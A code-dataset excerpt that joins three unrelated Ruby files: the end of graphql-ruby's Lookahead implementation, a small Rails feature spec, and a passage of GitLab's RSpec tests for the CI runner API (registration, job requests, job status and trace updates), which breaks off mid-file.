"#<GraphQL::Execution::Lookahead #{@field ? "@field=#{@field.path.inspect}": "@root_type=#{@root_type}"} @ast_nodes.size=#{@ast_nodes.size}>"
end
# This is returned for {Lookahead#selection} when a non-existent field is passed
class NullLookahead < Lookahead
# No inputs required here.
def initialize
end
def selected?
false
end
def selects?(*)
false
end
def selection(*)
NULL_LOOKAHEAD
end
def selections(*)
[]
end
def inspect
"#<GraphQL::Execution::Lookahead::NullLookahead>"
end
end
# A singleton, so that misses don't come with overhead.
NULL_LOOKAHEAD = NullLookahead.new
private
# If it's a symbol, stringify and camelize it
def normalize_name(name)
if name.is_a?(Symbol)
Schema::Member::BuildType.camelize(name.to_s)
else
name
end
end
def normalize_keyword(keyword)
if keyword.is_a?(String)
Schema::Member::BuildType.underscore(keyword).to_sym
else
keyword
end
end
def skipped_by_directive?(ast_selection)
ast_selection.directives.each do |directive|
dir_defn = @query.schema.directives.fetch(directive.name)
directive_class = dir_defn.type_class
if directive_class
dir_args = GraphQL::Execution::Lookahead::ArgumentHelpers.arguments(@query, dir_defn, directive)
return true unless directive_class.static_include?(dir_args, @query.context)
end
end
false
end
def find_selections(subselections_by_type, selections_on_type, selected_type, ast_selections, arguments)
ast_selections.each do |ast_selection|
next if skipped_by_directive?(ast_selection)
case ast_selection
when GraphQL::Language::Nodes::Field
response_key = ast_selection.alias || ast_selection.name
if selections_on_type.key?(response_key)
selections_on_type[response_key] << ast_selection
elsif arguments.nil? || arguments.empty?
selections_on_type[response_key] = [ast_selection]
else
field_defn = FieldHelpers.get_field(@query.schema, selected_type, ast_selection.name)
if arguments_match?(arguments, field_defn, ast_selection)
selections_on_type[response_key] = [ast_selection]
end
end
when GraphQL::Language::Nodes::InlineFragment
on_type = selected_type
subselections_on_type = selections_on_type
if (t = ast_selection.type)
# Assuming this is valid, that `t` will be found.
on_type = @query.schema.get_type(t.name).type_class
subselections_on_type = subselections_by_type[on_type] ||= {}
end
find_selections(subselections_by_type, subselections_on_type, on_type, ast_selection.selections, arguments)
when GraphQL::Language::Nodes::FragmentSpread
frag_defn = @query.fragments[ast_selection.name] || raise("Invariant: Can't look ahead to nonexistent fragment #{ast_selection.name} (found: #{@query.fragments.keys})")
# Again, assuming a valid AST
on_type = @query.schema.get_type(frag_defn.type.name).type_class
subselections_on_type = subselections_by_type[on_type] ||= {}
find_selections(subselections_by_type, subselections_on_type, on_type, frag_defn.selections, arguments)
else
raise "Invariant: Unexpected selection type: #{ast_selection.class}"
end
end
end
# If a selection on `node` matches `field_name` (which is backed by `field_defn`)
# and matches the `arguments:` constraints, then add that node to `matches`
def find_selected_nodes(node, field_name, field_defn, arguments:, matches:)
return if skipped_by_directive?(node)
case node
when GraphQL::Language::Nodes::Field
if node.name == field_name
if arguments.nil? || arguments.empty?
# No constraint applied
matches << node
elsif arguments_match?(arguments, field_defn, node)
matches << node
end
end
when GraphQL::Language::Nodes::InlineFragment
node.selections.each { |s| find_selected_nodes(s, field_name, field_defn, arguments: arguments, matches: matches) }
when GraphQL::Language::Nodes::FragmentSpread
frag_defn = @query.fragments[node.name] || raise("Invariant: Can't look ahead to nonexistent fragment #{node.name} (found: #{@query.fragments.keys})")
frag_defn.selections.each { |s| find_selected_nodes(s, field_name, field_defn, arguments: arguments, matches: matches) }
else
raise "Unexpected selection comparison on #{node.class.name} (#{node})"
end
end
def arguments_match?(arguments, field_defn, field_node)
query_kwargs = ArgumentHelpers.arguments(@query, field_defn, field_node)
arguments.all? do |arg_name, arg_value|
arg_name = normalize_keyword(arg_name)
# Make sure the constraint is present with a matching value
query_kwargs.key?(arg_name) && query_kwargs[arg_name] == arg_value
end
end
# TODO Dedup with interpreter
module ArgumentHelpers
module_function
def arguments(query, arg_owner, ast_node)
kwarg_arguments = {}
arg_defns = arg_owner.arguments
ast_node.arguments.each do |arg|
arg_defn = arg_defns[arg.name] || raise("Invariant: missing argument definition for #{arg.name.inspect} in #{arg_defns.keys} from #{arg_owner}")
# Need to distinguish between client-provided `nil`
# and nothing-at-all
is_present, value = arg_to_value(query, arg_defn.type, arg.value)
if is_present
kwarg_arguments[arg_defn.keyword] = value
end
end
arg_defns.each do |name, arg_defn|
if arg_defn.default_value? && !kwarg_arguments.key?(arg_defn.keyword)
kwarg_arguments[arg_defn.keyword] = arg_defn.default_value
end
end
kwarg_arguments
end
# Get a Ruby-ready value from a client query.
# @param graphql_object [Object] The owner of the field whose argument this is
# @param arg_type [Class, GraphQL::Schema::NonNull, GraphQL::Schema::List]
# @param ast_value [GraphQL::Language::Nodes::VariableIdentifier, String, Integer, Float, Boolean]
# @return [Array(is_present, value)]
def arg_to_value(query, arg_type, ast_value)
if ast_value.is_a?(GraphQL::Language::Nodes::VariableIdentifier)
# If it's not here, it will get added later
if query.variables.key?(ast_value.name)
return true, query.variables[ast_value.name]
else
return false, nil
end
elsif ast_value.is_a?(GraphQL::Language::Nodes::NullValue)
return true, nil
elsif arg_type.is_a?(GraphQL::Schema::NonNull)
arg_to_value(query, arg_type.of_type, ast_value)
elsif arg_type.is_a?(GraphQL::Schema::List)
# Treat a single value like a list
arg_value = Array(ast_value)
list = []
arg_value.map do |inner_v|
_present, value = arg_to_value(query, arg_type.of_type, inner_v)
list << value
end
return true, list
elsif arg_type.is_a?(Class) && arg_type < GraphQL::Schema::InputObject
# For these, `prepare` is applied during `#initialize`.
# Pass `nil` so it will be skipped in `#arguments`.
# What a mess.
args = arguments(query, nil, arg_type, ast_value)
# We're not tracking defaults_used, but for our purposes
# we compare the value to the default value.
return true, arg_type.new(ruby_kwargs: args, context: query.context, defaults_used: nil)
else
flat_value = flatten_ast_value(query, ast_value)
return true, arg_type.coerce_input(flat_value, query.context)
end
end
def flatten_ast_value(query, v)
case v
when GraphQL::Language::Nodes::Enum
v.name
when GraphQL::Language::Nodes::InputObject
h = {}
v.arguments.each do |arg|
h[arg.name] = flatten_ast_value(query, arg.value)
end
h
when Array
v.map { |v2| flatten_ast_value(query, v2) }
when GraphQL::Language::Nodes::VariableIdentifier
flatten_ast_value(query.variables[v.name])
else
v
end
end
end
# TODO dedup with interpreter
module FieldHelpers
module_function
def get_field(schema, owner_type, field_name)
field_defn = owner_type.get_field(field_name)
field_defn ||= if owner_type == schema.query.type_class && (entry_point_field = schema.introspection_system.entry_point(name: field_name))
entry_point_field.type_class
elsif (dynamic_field = schema.introspection_system.dynamic_field(name: field_name))
dynamic_field.type_class
else
nil
end
field_defn
end
end
end
end
end
| 40.46056 | 180 | 0.628388 |
38a770d8e2fc0a8a455fe200c9045bc7b3492ae5 | 286 | require 'rails_helper'
describe 'Destroy paper action', type: :feature do
let(:paper) { FactoryBot.create :paper }
before { visit paper_path(paper) }
it 'removes the paper from the database' do
expect { click_link 'Delete paper' }.to change(Paper, :count).by(-1)
end
end
| 23.833333 | 72 | 0.702797 |
d57993ab454003d545328765b749aeeffb3d0ab8 | 54,726 | require 'spec_helper'
describe API::Runner, :clean_gitlab_redis_shared_state do
include StubGitlabCalls
include RedisHelpers
let(:registration_token) { 'abcdefg123456' }
before do
stub_feature_flags(ci_enable_live_trace: true)
stub_gitlab_calls
stub_application_setting(runners_registration_token: registration_token)
allow_any_instance_of(Ci::Runner).to receive(:cache_attributes)
end
describe '/api/v4/runners' do
describe 'POST /api/v4/runners' do
context 'when no token is provided' do
it 'returns 400 error' do
post api('/runners')
expect(response).to have_gitlab_http_status 400
end
end
context 'when invalid token is provided' do
it 'returns 403 error' do
post api('/runners'), token: 'invalid'
expect(response).to have_gitlab_http_status 403
end
end
context 'when valid token is provided' do
it 'creates runner with default values' do
post api('/runners'), token: registration_token
runner = Ci::Runner.first
expect(response).to have_gitlab_http_status 201
expect(json_response['id']).to eq(runner.id)
expect(json_response['token']).to eq(runner.token)
expect(runner.run_untagged).to be true
expect(runner.active).to be true
expect(runner.token).not_to eq(registration_token)
expect(runner).to be_instance_type
end
context 'when project token is used' do
let(:project) { create(:project) }
it 'creates project runner' do
post api('/runners'), token: project.runners_token
expect(response).to have_gitlab_http_status 201
expect(project.runners.size).to eq(1)
runner = Ci::Runner.first
expect(runner.token).not_to eq(registration_token)
expect(runner.token).not_to eq(project.runners_token)
expect(runner).to be_project_type
end
end
context 'when group token is used' do
let(:group) { create(:group) }
it 'creates a group runner' do
post api('/runners'), token: group.runners_token
expect(response).to have_http_status 201
expect(group.runners.size).to eq(1)
runner = Ci::Runner.first
expect(runner.token).not_to eq(registration_token)
expect(runner.token).not_to eq(group.runners_token)
expect(runner).to be_group_type
end
end
end
context 'when runner description is provided' do
it 'creates runner' do
post api('/runners'), token: registration_token,
description: 'server.hostname'
expect(response).to have_gitlab_http_status 201
expect(Ci::Runner.first.description).to eq('server.hostname')
end
end
context 'when runner tags are provided' do
it 'creates runner' do
post api('/runners'), token: registration_token,
tag_list: 'tag1, tag2'
expect(response).to have_gitlab_http_status 201
expect(Ci::Runner.first.tag_list.sort).to eq(%w(tag1 tag2))
end
end
context 'when option for running untagged jobs is provided' do
context 'when tags are provided' do
it 'creates runner' do
post api('/runners'), token: registration_token,
run_untagged: false,
tag_list: ['tag']
expect(response).to have_gitlab_http_status 201
expect(Ci::Runner.first.run_untagged).to be false
expect(Ci::Runner.first.tag_list.sort).to eq(['tag'])
end
end
context 'when tags are not provided' do
it 'returns 400 error' do
post api('/runners'), token: registration_token,
run_untagged: false
expect(response).to have_gitlab_http_status 400
expect(json_response['message']).to include(
'tags_list' => ['can not be empty when runner is not allowed to pick untagged jobs'])
end
end
end
context 'when option for locking Runner is provided' do
it 'creates runner' do
post api('/runners'), token: registration_token,
locked: true
expect(response).to have_gitlab_http_status 201
expect(Ci::Runner.first.locked).to be true
end
end
context 'when option for activating a Runner is provided' do
context 'when active is set to true' do
it 'creates runner' do
post api('/runners'), token: registration_token,
active: true
expect(response).to have_gitlab_http_status 201
expect(Ci::Runner.first.active).to be true
end
end
context 'when active is set to false' do
it 'creates runner' do
post api('/runners'), token: registration_token,
active: false
expect(response).to have_gitlab_http_status 201
expect(Ci::Runner.first.active).to be false
end
end
end
context 'when maximum job timeout is specified' do
it 'creates runner' do
post api('/runners'), token: registration_token,
maximum_timeout: 9000
expect(response).to have_gitlab_http_status 201
expect(Ci::Runner.first.maximum_timeout).to eq(9000)
end
context 'when maximum job timeout is empty' do
it 'creates runner' do
post api('/runners'), token: registration_token,
maximum_timeout: ''
expect(response).to have_gitlab_http_status 201
expect(Ci::Runner.first.maximum_timeout).to be_nil
end
end
end
%w(name version revision platform architecture).each do |param|
context "when info parameter '#{param}' info is present" do
let(:value) { "#{param}_value" }
it "updates provided Runner's parameter" do
post api('/runners'), token: registration_token,
info: { param => value }
expect(response).to have_gitlab_http_status 201
expect(Ci::Runner.first.read_attribute(param.to_sym)).to eq(value)
end
end
end
it "sets the runner's ip_address" do
post api('/runners'),
{ token: registration_token },
{ 'REMOTE_ADDR' => '123.111.123.111' }
expect(response).to have_gitlab_http_status 201
expect(Ci::Runner.first.ip_address).to eq('123.111.123.111')
end
end
describe 'DELETE /api/v4/runners' do
context 'when no token is provided' do
it 'returns 400 error' do
delete api('/runners')
expect(response).to have_gitlab_http_status 400
end
end
context 'when invalid token is provided' do
it 'returns 403 error' do
delete api('/runners'), token: 'invalid'
expect(response).to have_gitlab_http_status 403
end
end
context 'when valid token is provided' do
let(:runner) { create(:ci_runner) }
it 'deletes Runner' do
delete api('/runners'), token: runner.token
expect(response).to have_gitlab_http_status 204
expect(Ci::Runner.count).to eq(0)
end
it_behaves_like '412 response' do
let(:request) { api('/runners') }
let(:params) { { token: runner.token } }
end
end
end
describe 'POST /api/v4/runners/verify' do
let(:runner) { create(:ci_runner) }
context 'when no token is provided' do
it 'returns 400 error' do
post api('/runners/verify')
expect(response).to have_gitlab_http_status :bad_request
end
end
context 'when invalid token is provided' do
it 'returns 403 error' do
post api('/runners/verify'), token: 'invalid-token'
expect(response).to have_gitlab_http_status 403
end
end
context 'when valid token is provided' do
it 'verifies Runner credentials' do
post api('/runners/verify'), token: runner.token
expect(response).to have_gitlab_http_status 200
end
end
end
end
describe '/api/v4/jobs' do
let(:project) { create(:project, shared_runners_enabled: false) }
let(:pipeline) { create(:ci_pipeline_without_jobs, project: project, ref: 'master') }
let(:runner) { create(:ci_runner, :project, projects: [project]) }
let(:job) do
create(:ci_build, :artifacts, :extended_options,
pipeline: pipeline, name: 'spinach', stage: 'test', stage_idx: 0, commands: "ls\ndate")
end
describe 'POST /api/v4/jobs/request' do
let!(:last_update) {}
let!(:new_update) { }
let(:user_agent) { 'gitlab-runner 9.0.0 (9-0-stable; go1.7.4; linux/amd64)' }
before do
job
stub_container_registry_config(enabled: false)
end
shared_examples 'no jobs available' do
before do
request_job
end
context 'when runner sends version in User-Agent' do
context 'for stable version' do
it 'gives 204 and set X-GitLab-Last-Update' do
expect(response).to have_gitlab_http_status(204)
expect(response.header).to have_key('X-GitLab-Last-Update')
end
end
context 'when last_update is up-to-date' do
let(:last_update) { runner.ensure_runner_queue_value }
it 'gives 204 and set the same X-GitLab-Last-Update' do
expect(response).to have_gitlab_http_status(204)
expect(response.header['X-GitLab-Last-Update']).to eq(last_update)
end
end
context 'when last_update is outdated' do
let(:last_update) { runner.ensure_runner_queue_value }
let(:new_update) { runner.tick_runner_queue }
it 'gives 204 and set a new X-GitLab-Last-Update' do
expect(response).to have_gitlab_http_status(204)
expect(response.header['X-GitLab-Last-Update']).to eq(new_update)
end
end
context 'when beta version is sent' do
let(:user_agent) { 'gitlab-runner 9.0.0~beta.167.g2b2bacc (master; go1.7.4; linux/amd64)' }
it { expect(response).to have_gitlab_http_status(204) }
end
context 'when pre-9-0 version is sent' do
let(:user_agent) { 'gitlab-ci-multi-runner 1.6.0 (1-6-stable; go1.6.3; linux/amd64)' }
it { expect(response).to have_gitlab_http_status(204) }
end
context 'when pre-9-0 beta version is sent' do
let(:user_agent) { 'gitlab-ci-multi-runner 1.6.0~beta.167.g2b2bacc (master; go1.6.3; linux/amd64)' }
it { expect(response).to have_gitlab_http_status(204) }
end
end
end
context 'when no token is provided' do
it 'returns 400 error' do
post api('/jobs/request')
expect(response).to have_gitlab_http_status 400
end
end
context 'when invalid token is provided' do
it 'returns 403 error' do
post api('/jobs/request'), token: 'invalid'
expect(response).to have_gitlab_http_status 403
end
end
context 'when valid token is provided' do
context 'when Runner is not active' do
let(:runner) { create(:ci_runner, :inactive) }
let(:update_value) { runner.ensure_runner_queue_value }
it 'returns 204 error' do
request_job
expect(response).to have_gitlab_http_status(204)
expect(response.header['X-GitLab-Last-Update']).to eq(update_value)
end
end
context 'when jobs are finished' do
before do
job.success
end
it_behaves_like 'no jobs available'
end
context 'when other projects have pending jobs' do
before do
job.success
create(:ci_build, :pending)
end
it_behaves_like 'no jobs available'
end
context 'when shared runner requests job for project without shared_runners_enabled' do
let(:runner) { create(:ci_runner, :instance) }
it_behaves_like 'no jobs available'
end
context 'when there is a pending job' do
let(:expected_job_info) do
{ 'name' => job.name,
'stage' => job.stage,
'project_id' => job.project.id,
'project_name' => job.project.name }
end
let(:expected_git_info) do
{ 'repo_url' => job.repo_url,
'ref' => job.ref,
'sha' => job.sha,
'before_sha' => job.before_sha,
'ref_type' => 'branch' }
end
let(:expected_steps) do
[{ 'name' => 'script',
'script' => %w(ls date),
'timeout' => job.metadata_timeout,
'when' => 'on_success',
'allow_failure' => false },
{ 'name' => 'after_script',
'script' => %w(ls date),
'timeout' => job.metadata_timeout,
'when' => 'always',
'allow_failure' => true }]
end
let(:expected_variables) do
[{ 'key' => 'CI_JOB_NAME', 'value' => 'spinach', 'public' => true },
{ 'key' => 'CI_JOB_STAGE', 'value' => 'test', 'public' => true },
{ 'key' => 'DB_NAME', 'value' => 'postgres', 'public' => true }]
end
let(:expected_artifacts) do
[{ 'name' => 'artifacts_file',
'untracked' => false,
'paths' => %w(out/),
'when' => 'always',
'expire_in' => '7d' }]
end
let(:expected_cache) do
[{ 'key' => 'cache_key',
'untracked' => false,
'paths' => ['vendor/*'],
'policy' => 'pull-push' }]
end
let(:expected_features) { { 'trace_sections' => true } }
it 'picks a job' do
request_job info: { platform: :darwin }
expect(response).to have_gitlab_http_status(201)
expect(response.headers).not_to have_key('X-GitLab-Last-Update')
expect(runner.reload.platform).to eq('darwin')
expect(json_response['id']).to eq(job.id)
expect(json_response['token']).to eq(job.token)
expect(json_response['job_info']).to eq(expected_job_info)
expect(json_response['git_info']).to eq(expected_git_info)
expect(json_response['image']).to eq({ 'name' => 'ruby:2.1', 'entrypoint' => '/bin/sh' })
expect(json_response['services']).to eq([{ 'name' => 'postgres', 'entrypoint' => nil,
'alias' => nil, 'command' => nil },
{ 'name' => 'docker:stable-dind', 'entrypoint' => '/bin/sh',
'alias' => 'docker', 'command' => 'sleep 30' }])
expect(json_response['steps']).to eq(expected_steps)
expect(json_response['artifacts']).to eq(expected_artifacts)
expect(json_response['cache']).to eq(expected_cache)
expect(json_response['variables']).to include(*expected_variables)
expect(json_response['features']).to eq(expected_features)
end
context 'when job is made for tag' do
let!(:job) { create(:ci_build, :tag, pipeline: pipeline, name: 'spinach', stage: 'test', stage_idx: 0) }
it 'sets branch as ref_type' do
request_job
expect(response).to have_gitlab_http_status(201)
expect(json_response['git_info']['ref_type']).to eq('tag')
end
end
context 'when job is made for branch' do
it 'sets tag as ref_type' do
request_job
expect(response).to have_gitlab_http_status(201)
expect(json_response['git_info']['ref_type']).to eq('branch')
end
end
it 'updates runner info' do
expect { request_job }.to change { runner.reload.contacted_at }
end
%w(version revision platform architecture).each do |param|
context "when info parameter '#{param}' is present" do
let(:value) { "#{param}_value" }
it "updates provided Runner's parameter" do
request_job info: { param => value }
expect(response).to have_gitlab_http_status(201)
expect(runner.reload.read_attribute(param.to_sym)).to eq(value)
end
end
end
it "sets the runner's ip_address" do
post api('/jobs/request'),
{ token: runner.token },
{ 'User-Agent' => user_agent, 'REMOTE_ADDR' => '123.222.123.222' }
expect(response).to have_gitlab_http_status 201
expect(runner.reload.ip_address).to eq('123.222.123.222')
end
context 'when concurrently updating a job' do
before do
expect_any_instance_of(Ci::Build).to receive(:run!)
.and_raise(ActiveRecord::StaleObjectError.new(nil, nil))
end
it 'returns a conflict' do
request_job
expect(response).to have_gitlab_http_status(409)
expect(response.headers).not_to have_key('X-GitLab-Last-Update')
end
end
context 'when project and pipeline have multiple jobs' do
let!(:job) { create(:ci_build, :tag, pipeline: pipeline, name: 'spinach', stage: 'test', stage_idx: 0) }
let!(:job2) { create(:ci_build, :tag, pipeline: pipeline, name: 'rubocop', stage: 'test', stage_idx: 0) }
let!(:test_job) { create(:ci_build, pipeline: pipeline, name: 'deploy', stage: 'deploy', stage_idx: 1) }
before do
job.success
job2.success
end
it 'returns dependent jobs' do
request_job
expect(response).to have_gitlab_http_status(201)
expect(json_response['id']).to eq(test_job.id)
expect(json_response['dependencies'].count).to eq(2)
expect(json_response['dependencies']).to include(
{ 'id' => job.id, 'name' => job.name, 'token' => job.token },
{ 'id' => job2.id, 'name' => job2.name, 'token' => job2.token })
end
end
context 'when pipeline have jobs with artifacts' do
let!(:job) { create(:ci_build, :tag, :artifacts, pipeline: pipeline, name: 'spinach', stage: 'test', stage_idx: 0) }
let!(:test_job) { create(:ci_build, pipeline: pipeline, name: 'deploy', stage: 'deploy', stage_idx: 1) }
before do
job.success
end
it 'returns dependent jobs' do
request_job
expect(response).to have_gitlab_http_status(201)
expect(json_response['id']).to eq(test_job.id)
expect(json_response['dependencies'].count).to eq(1)
expect(json_response['dependencies']).to include(
{ 'id' => job.id, 'name' => job.name, 'token' => job.token,
'artifacts_file' => { 'filename' => 'ci_build_artifacts.zip', 'size' => 106365 } })
end
end
context 'when explicit dependencies are defined' do
let!(:job) { create(:ci_build, :tag, pipeline: pipeline, name: 'spinach', stage: 'test', stage_idx: 0) }
let!(:job2) { create(:ci_build, :tag, pipeline: pipeline, name: 'rubocop', stage: 'test', stage_idx: 0) }
let!(:test_job) do
create(:ci_build, pipeline: pipeline, token: 'test-job-token', name: 'deploy',
stage: 'deploy', stage_idx: 1,
options: { dependencies: [job2.name] })
end
before do
job.success
job2.success
end
it 'returns dependent jobs' do
request_job
expect(response).to have_gitlab_http_status(201)
expect(json_response['id']).to eq(test_job.id)
expect(json_response['dependencies'].count).to eq(1)
expect(json_response['dependencies'][0]).to include('id' => job2.id, 'name' => job2.name, 'token' => job2.token)
end
end
context 'when dependencies is an empty array' do
let!(:job) { create(:ci_build, :tag, pipeline: pipeline, name: 'spinach', stage: 'test', stage_idx: 0) }
let!(:job2) { create(:ci_build, :tag, pipeline: pipeline, name: 'rubocop', stage: 'test', stage_idx: 0) }
let!(:empty_dependencies_job) do
create(:ci_build, pipeline: pipeline, token: 'test-job-token', name: 'empty_dependencies_job',
stage: 'deploy', stage_idx: 1,
options: { dependencies: [] })
end
before do
job.success
job2.success
end
it 'returns an empty array' do
request_job
expect(response).to have_gitlab_http_status(201)
expect(json_response['id']).to eq(empty_dependencies_job.id)
expect(json_response['dependencies'].count).to eq(0)
end
end
context 'when job has no tags' do
before do
job.update(tags: [])
end
context 'when runner is allowed to pick untagged jobs' do
before do
runner.update_column(:run_untagged, true)
end
it 'picks job' do
request_job
expect(response).to have_gitlab_http_status 201
end
end
context 'when runner is not allowed to pick untagged jobs' do
before do
runner.update_column(:run_untagged, false)
end
it_behaves_like 'no jobs available'
end
end
context 'when triggered job is available' do
let(:expected_variables) do
[{ 'key' => 'CI_JOB_NAME', 'value' => 'spinach', 'public' => true },
{ 'key' => 'CI_JOB_STAGE', 'value' => 'test', 'public' => true },
{ 'key' => 'CI_PIPELINE_TRIGGERED', 'value' => 'true', 'public' => true },
{ 'key' => 'DB_NAME', 'value' => 'postgres', 'public' => true },
{ 'key' => 'SECRET_KEY', 'value' => 'secret_value', 'public' => false },
{ 'key' => 'TRIGGER_KEY_1', 'value' => 'TRIGGER_VALUE_1', 'public' => false }]
end
let(:trigger) { create(:ci_trigger, project: project) }
let!(:trigger_request) { create(:ci_trigger_request, pipeline: pipeline, builds: [job], trigger: trigger) }
before do
project.variables << Ci::Variable.new(key: 'SECRET_KEY', value: 'secret_value')
end
shared_examples 'expected variables behavior' do
it 'returns variables for triggers' do
request_job
expect(response).to have_gitlab_http_status(201)
expect(json_response['variables']).to include(*expected_variables)
end
end
context 'when variables are stored in trigger_request' do
before do
trigger_request.update_attribute(:variables, { TRIGGER_KEY_1: 'TRIGGER_VALUE_1' } )
end
it_behaves_like 'expected variables behavior'
end
context 'when variables are stored in pipeline_variables' do
before do
create(:ci_pipeline_variable, pipeline: pipeline, key: :TRIGGER_KEY_1, value: 'TRIGGER_VALUE_1')
end
it_behaves_like 'expected variables behavior'
end
end
describe 'registry credentials support' do
let(:registry_url) { 'registry.example.com:5005' }
let(:registry_credentials) do
{ 'type' => 'registry',
'url' => registry_url,
'username' => 'gitlab-ci-token',
'password' => job.token }
end
context 'when registry is enabled' do
before do
stub_container_registry_config(enabled: true, host_port: registry_url)
end
it 'sends registry credentials key' do
request_job
expect(json_response).to have_key('credentials')
expect(json_response['credentials']).to include(registry_credentials)
end
end
context 'when registry is disabled' do
before do
stub_container_registry_config(enabled: false, host_port: registry_url)
end
it 'does not send registry credentials' do
request_job
expect(json_response).to have_key('credentials')
expect(json_response['credentials']).not_to include(registry_credentials)
end
end
end
describe 'timeout support' do
context 'when project specifies job timeout' do
let(:project) { create(:project, shared_runners_enabled: false, build_timeout: 1234) }
it 'contains info about timeout taken from project' do
request_job
expect(response).to have_gitlab_http_status(201)
expect(json_response['runner_info']).to include({ 'timeout' => 1234 })
end
context 'when runner specifies lower timeout' do
let(:runner) { create(:ci_runner, :project, maximum_timeout: 1000, projects: [project]) }
it 'contains info about timeout overridden by runner' do
request_job
expect(response).to have_gitlab_http_status(201)
expect(json_response['runner_info']).to include({ 'timeout' => 1000 })
end
end
context 'when runner specifies bigger timeout' do
let(:runner) { create(:ci_runner, :project, maximum_timeout: 2000, projects: [project]) }
it 'contains info about timeout not overridden by runner' do
request_job
expect(response).to have_gitlab_http_status(201)
expect(json_response['runner_info']).to include({ 'timeout' => 1234 })
end
end
end
end
end
def request_job(token = runner.token, **params)
new_params = params.merge(token: token, last_update: last_update)
post api('/jobs/request'), new_params, { 'User-Agent' => user_agent }
end
end
end
describe 'PUT /api/v4/jobs/:id' do
let(:job) { create(:ci_build, :pending, :trace_live, pipeline: pipeline, runner_id: runner.id) }
before do
job.run!
end
context 'when status is given' do
it 'mark job as succeeded' do
update_job(state: 'success')
job.reload
expect(job).to be_success
end
it 'mark job as failed' do
update_job(state: 'failed')
job.reload
expect(job).to be_failed
expect(job).to be_unknown_failure
end
context 'when failure_reason is script_failure' do
before do
update_job(state: 'failed', failure_reason: 'script_failure')
job.reload
end
it { expect(job).to be_script_failure }
end
context 'when failure_reason is runner_system_failure' do
before do
update_job(state: 'failed', failure_reason: 'runner_system_failure')
job.reload
end
it { expect(job).to be_runner_system_failure }
end
end
context 'when trace is given' do
it 'creates a trace artifact' do
allow(BuildFinishedWorker).to receive(:perform_async).with(job.id) do
ArchiveTraceWorker.new.perform(job.id)
end
update_job(state: 'success', trace: 'BUILD TRACE UPDATED')
job.reload
expect(response).to have_gitlab_http_status(200)
expect(job.trace.raw).to eq 'BUILD TRACE UPDATED'
expect(job.job_artifacts_trace.open.read).to eq 'BUILD TRACE UPDATED'
end
end
context 'when no trace is given' do
it 'does not override trace information' do
update_job
expect(job.reload.trace.raw).to eq 'BUILD TRACE'
end
context 'when running state is sent' do
it 'updates update_at value' do
expect { update_job_after_time }.to change { job.reload.updated_at }
end
end
context 'when other state is sent' do
it "doesn't update update_at value" do
expect { update_job_after_time(20.minutes, state: 'success') }.not_to change { job.reload.updated_at }
end
end
end
context 'when job has been erased' do
let(:job) { create(:ci_build, runner_id: runner.id, erased_at: Time.now) }
it 'responds with forbidden' do
update_job
expect(response).to have_gitlab_http_status(403)
end
end
context 'when job has already been finished' do
before do
job.trace.set('Job failed')
job.drop!(:script_failure)
end
it 'does not update job status and job trace' do
update_job(state: 'success', trace: 'BUILD TRACE UPDATED')
job.reload
expect(response).to have_gitlab_http_status(403)
expect(response.header['Job-Status']).to eq 'failed'
expect(job.trace.raw).to eq 'Job failed'
expect(job).to be_failed
end
end
def update_job(token = job.token, **params)
new_params = params.merge(token: token)
put api("/jobs/#{job.id}"), new_params
end
def update_job_after_time(update_interval = 20.minutes, state = 'running')
Timecop.travel(job.updated_at + update_interval) do
update_job(job.token, state: state)
end
end
end
describe 'PATCH /api/v4/jobs/:id/trace' do
let(:job) { create(:ci_build, :running, :trace_live, runner_id: runner.id, pipeline: pipeline) }
let(:headers) { { API::Helpers::Runner::JOB_TOKEN_HEADER => job.token, 'Content-Type' => 'text/plain' } }
let(:headers_with_range) { headers.merge({ 'Content-Range' => '11-20' }) }
let(:update_interval) { 10.seconds.to_i }
before do
initial_patch_the_trace
end
context 'when request is valid' do
it 'gets correct response' do
expect(response.status).to eq 202
expect(job.reload.trace.raw).to eq 'BUILD TRACE appended'
expect(response.header).to have_key 'Range'
expect(response.header).to have_key 'Job-Status'
end
context 'when job has been updated recently' do
it { expect { patch_the_trace }.not_to change { job.updated_at }}
it "changes the job's trace" do
patch_the_trace
expect(job.reload.trace.raw).to eq 'BUILD TRACE appended appended'
end
context 'when Runner makes a force-patch' do
it { expect { force_patch_the_trace }.not_to change { job.updated_at }}
it "doesn't change the build.trace" do
force_patch_the_trace
expect(job.reload.trace.raw).to eq 'BUILD TRACE appended'
end
end
end
context 'when job was not updated recently' do
let(:update_interval) { 15.minutes.to_i }
it { expect { patch_the_trace }.to change { job.updated_at } }
it 'changes the job.trace' do
patch_the_trace
expect(job.reload.trace.raw).to eq 'BUILD TRACE appended appended'
end
context 'when Runner makes a force-patch' do
it { expect { force_patch_the_trace }.to change { job.updated_at } }
it "doesn't change the job.trace" do
force_patch_the_trace
expect(job.reload.trace.raw).to eq 'BUILD TRACE appended'
end
end
end
context 'when project for the build has been deleted' do
let(:job) do
create(:ci_build, :running, :trace_live, runner_id: runner.id, pipeline: pipeline) do |job|
job.project.update(pending_delete: true)
end
end
it 'responds with forbidden' do
expect(response.status).to eq(403)
end
end
context 'when trace is patched' do
before do
patch_the_trace
end
it 'has valid trace' do
expect(response.status).to eq(202)
expect(job.reload.trace.raw).to eq 'BUILD TRACE appended appended'
end
context 'when job is cancelled' do
before do
job.cancel
end
context 'when trace is patched' do
before do
patch_the_trace
end
it 'returns Forbidden ' do
expect(response.status).to eq(403)
end
end
end
context 'when redis data are flushed' do
before do
redis_shared_state_cleanup!
end
it 'has empty trace' do
expect(job.reload.trace.raw).to eq ''
end
context 'when we perform partial patch' do
before do
patch_the_trace('hello', headers.merge({ 'Content-Range' => "28-32/5" }))
end
it 'returns an error' do
expect(response.status).to eq(416)
expect(response.header['Range']).to eq('0-0')
end
end
context 'when we resend full trace' do
before do
patch_the_trace('BUILD TRACE appended appended hello', headers.merge({ 'Content-Range' => "0-34/35" }))
end
it 'succeeds with updating trace' do
expect(response.status).to eq(202)
expect(job.reload.trace.raw).to eq 'BUILD TRACE appended appended hello'
end
end
end
end
context 'when the job is canceled' do
before do
job.cancel
patch_the_trace
end
it 'receives status in header' do
expect(response.header['Job-Status']).to eq 'canceled'
end
end
end
context 'when Runner makes a force-patch' do
before do
force_patch_the_trace
end
it 'gets correct response' do
expect(response.status).to eq 202
expect(job.reload.trace.raw).to eq 'BUILD TRACE appended'
expect(response.header).to have_key 'Range'
expect(response.header).to have_key 'Job-Status'
end
end
context 'when content-range start is too big' do
let(:headers_with_range) { headers.merge({ 'Content-Range' => '15-20/6' }) }
it 'gets 416 error response with range headers' do
expect(response.status).to eq 416
expect(response.header).to have_key 'Range'
expect(response.header['Range']).to eq '0-11'
end
end
